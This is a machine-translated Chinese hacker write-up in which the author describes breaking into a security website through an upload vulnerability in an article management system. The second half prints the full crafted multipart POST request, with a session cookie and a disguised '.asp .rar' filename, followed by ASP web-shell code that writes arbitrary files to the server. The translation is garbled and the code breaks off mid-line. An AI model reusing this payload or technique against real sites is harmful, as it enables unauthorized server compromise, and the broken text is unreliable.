Source: Evil octal Chinese author of the article: evil cat [EST] (EvilCat [EST]) recent holiday at home, nothing, more time online, today rolled to the likes of several security sites, the new site Good articles are giving everyone to the EST forum (嘻). It's also idle, simply in the friendship of these sites, can I do any new thing. Ok, let's take a look at this friendly connection. Well, the website's beauty is not bad, look at the article, there is nothing to do so. Just leave this site, find this site's page system is very familiar, like a powerful article system, huh, look at the bottom of the page, "Powered by: fp3.6 sp2" halo ~~ Fruit is really guess, It is a free power article system. There is also a DVBBS7.0SP2 on the site. For professional problems, I am interested in this site ••••••••, register a account in the free-motivational article system. I entered the user control panel to see, I don't say everyone, I should know what I want to do •••••• Upload, huh. Look at the location of the upload software, "Sorry, this site is not allowed to upload", but also as a hacking site to upload vulnerabilities. I remember that I have sent a "breakthrough power article upload vulnerability" in the hacker X archive period, the article shows that we can upload an ASP Trojan with a Post attack in the case of prohibiting registered users. In this case, is this type of attack? Well, try it. I will submit this page page Return "Sorry, this website is not allowed to be uploaded!" We will submit " page Back "Please select the file you want to upload!" "Haha, this shows that the POST's content can be submitted with NC. The POST is of course ASP Trojan. From now on, the chance of success is only 50% because the other party will repair upload vulnerabilities, even if posts are definitely , The file format is wrong. I found a data package that I used to use the free power to go to the vulnerability, and then submit it with NC, 嘻嘻, upload is successful. About the revision of the datagram and the use of the upload vulnerability, I miss me You don't have to say it over again. Everyone should be very skilled. Below the POST past data report: Code: post /upfile_soft.asp http / 1.1
Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application / x-shockwave-flash, application /, application /, application / msword, * / *
Referr: [URL] [/ url]
Accept-language: zh-cn
Content-Type: Multipart / Form-Data; Boundary = --------------------------- 7D531C25440A0C
Accept-encoding: Gzip, deflate
User-agent: mozilla / 4.0 (compatible; msie 6.0; windows NT 5.1; sv1; maxth); .NET CLR 1.1.4322)
Host: [URL] [/ url]
Content-Length: 1497Connection: Keep-alive
Cache-Control: No-cache
Cookie: aspsessionidqscqsada = iceejphaljlebhkfiojdplod; 831225 = cookiedate = 1 & password = 635d6ca36de2ff6f & userlevel = 999 & username = cat;
---------------------------- 7D531C25440A0C
Content-disposition: form-data; name = "filename"; filename = "c: / documents and settings / / desktop / injection / mm.asp .rar"
Content-Type: Text / Plain
<% DIM ObjcountFile%>
<% on error resume next%>
<% Set objfso = server.createObject ("scripting.filesystemObject")%>
<% IF Trim (Request ("SyfdPath")) <> "" "" "
<% fdata = request ("cyfddata")%>
<% Set objcountfile = objfso.createtextfile (Request ("SyfdPath"), TRUE)%>
<% objcountfile.write fdata%>
<% IF ERR = 0 THEN%>
<% response.write save success! font>%>
<% ELSE%>
<% response.write " save unsuccess! font>"%>
<% end if%>
<% err.clear%>
<% end if%>
<% ObjcountFile.close%>
<% Set objcountfile = Nothing%>
<% Set objfso = NOTHING%>
<% Response.write "